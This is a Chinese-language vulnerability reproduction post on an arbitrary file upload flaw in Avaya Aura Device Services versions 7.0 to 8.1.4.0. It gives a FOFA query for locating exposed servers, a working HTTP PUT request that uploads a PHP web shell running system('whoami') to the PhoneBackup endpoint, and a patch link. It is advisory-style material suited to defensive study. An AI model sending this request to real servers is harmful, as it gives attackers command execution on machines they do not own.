当前位置: 首页 > news >正文

Avaya Aura Device Services 任意文件上传漏洞复现

news 2025/7/22 13:05:25

0x01 产品简介

Avaya Aura Device Services是美国Avaya公司的一个应用软件。提供一个管理 Avaya 端点功能。

0x02 漏洞概述

Avaya Aura Device Services 系统PhoneBackup接口处存在任意文件上传漏洞,攻击者可绕过验证上传任意文件获取服务器权限。

0x03 影响范围

Avaya Aura Device Services  7.0-8.1.4.0版本

0x04 复现环境

FOFA:app="AVAYA-Aura-Utility-Server"

0x05 漏洞复现

PoC

PUT /PhoneBackup/123.php HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: AVAYA
Content-Length: 23<?php system('whoami');

PS:简单粗暴,直接put上传

验证

0x06 修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:https://support.avaya.com/。

http://www.lryc.cn/news/256380.html

相关文章:

  • C#注册表技术及操作
  • js/jQuery常见操作 之各种语法例子(包括jQuery中常见的与索引相关的选择器)
  • C语言数组(下)
  • pytorch学习5-最大池化层的使用
  • 在python中安装库,会有conda安装,也会有pip安装,conda与pip的区别是什么?
  • 算法-贪心思想
  • STL源码剖析笔记——适配器(adapters)
  • Mysql、Oracle区分大小写?
  • Java多线程并发(二)
  • 树莓派外接上显示器以后一直黑屏无画面显示
  • 使用Ansible lineinfile模块进行行级别操作
  • curl 18 HTTP/2 stream
  • 5G+AI开花结果,助力智慧安检落地
  • Swift 如何实现自定义 Tab Bar
  • mysql 语言学习
  • 微信小程序基础bug
  • 13、pytest为失败的断言定义自己的解释
  • Flink优化——数据倾斜(二)
  • Unity打包到Webgl平台以及遇到的问题
  • c语言编程题经典100例——(90~95例)
  • Redis核心知识点总结
  • stm32Flash操作
  • 云原生系列1
  • 设计原则 | 里式替换原则
  • 第7节:Vue3 动态绑定多个属性
  • 【文件上传系列】No.1 大文件分片、进度图展示(原生前端 + Node 后端 Koa)
  • 性能测试 —— Jmeter分布式测试的注意事项和常见问题
  • “SRP模型+”多技术融合在生态环境脆弱性评价模型构建、时空格局演变分析与RSEI 指数的生态质量评价及拓展应用
  • 总结|哪些平台有大模型知识库的Web API服务
  • TOMCAT9安装